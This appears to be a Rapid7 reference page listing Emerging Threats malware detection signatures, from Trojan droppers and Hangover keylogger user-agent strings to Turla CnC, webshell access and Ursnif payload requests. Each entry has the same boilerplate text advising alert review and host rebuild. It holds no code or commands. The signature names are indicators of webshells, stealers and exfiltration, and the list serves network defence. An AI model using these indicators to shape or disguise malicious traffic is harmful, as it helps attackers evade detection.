ET MALWARE Trojan-Dropper.Delf Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.Agent.ksja

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.StartPage.dvm or Mebromi Bios Rootkit CnC Count Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Dropper.Win32.Sysn.cdjy CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.FakeMS Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Generic.5325921 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Generic - POST To gate.php with no accept headers

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Generic - POST To gate.php with no referer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Internet Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.JS.Agent.dwz Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.JS.QLP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Kwampirs Outbound GET request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan/MSIL.bfsx Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan/MSIL.DOTHETUK CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.NSIS.Comame.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Downloading PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Nurjax Retrieving Domains via JS

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Ransom.Win32.Blocker.dham Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger.acqh User-Agent(EMSFRTCBVD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(bugmaal)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DEMO)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DEMOMAKE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(DSMBVCTFRE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(FMBVDFRESCT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(folderwin)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(MBESCVDFRT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(nento)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(sendFile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(smaal)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(TCBFRVDEMS)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(UPHTTP)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanSpy.KeyLogger Hangover Campaign User-Agent(vbusers)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Spy.Win32.KeyLogger.acuj Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Spy.Win32.Zbot.qgxi Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Verblecon User Agent Observed

Description
Copy link

This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.A.FakeAV Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Antavmu.guw Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Buzus Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Codenox.gyezu CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Cosmu.xet CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan/Win32.FraudPack User-Agent (Downloader MLR 1.0.0)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Genome.aetqe Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Jorik.Totem.vg HTTP request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Qadars Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.VB.cefz Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.VBKrypt.cugq/Umbra Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TROJAN Win32-WebSec Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Win32.Yakes.pwo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TROJ_PROX.AFV POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troj/ReRol.A Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troj/ReRol.A Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Troxen Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrueBot/Silence.Downloader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrueBot/Silence.Downloader Keep-Alive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trustezeb Checkin to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TSPY_BANKER.IDV/Infostealer.Bancos Module Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ttint XORed CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TURLA APT CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Turla Kopiluwak User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TURLA NETFLASH CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TwoFace WebShell Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Umbra/Multibot Loader User-Agent (umbra)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Umbra/MultiBot Plugin access

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unattributed WebShell Access - Command Execution

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unattributed WebShell Access - File Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UNC2628 BEACON Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE UNC2628 Malicious MSHTA Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unicorn Stealer Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.CoinMiner Loader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Unk.DPRK MalDoc SysInfo CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Actor Targeting Minority Groups CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Chinese Threat Actor Malicious Redirect Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown DPRK Threat Actor Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown - Loader - Check .exe Updated

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Mailer CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Unknown Possibly Ransomware (Dropped by RIG) CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Unknown Rootkit Checkin Activity (getSystemInfo)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Rootkit Download Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Trojan with Fake Java User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unknown Webserver Backdoor

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.PSAttack Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.VBSLoader Retrieving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unk.VBSLoader Retrieving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Unruy Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Binary Download Jan 02 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct Dec 01 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct Feb 12 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Common URI Struct July 15 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre Downloader 2p (Zeus) May 07 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre External IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Upatre User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UPDATE Protocol Trojan Communication detected on http ports 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE UPDATE Protocol Trojan Communication detected on non-http ports 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE URI Struct Observed in Pawn Storm CVE-2015-2950

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh/Bublik Checkin /was/uid.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh/Bublik Checkin /was/vas.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Urlzone/Bebloh Trojan Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Uroburos/Turla CnC (OUTBOUND) 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Uroburos/Turla CnC (OUTBOUND) 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursa Loader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (cook32.rar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (cook64.rar)

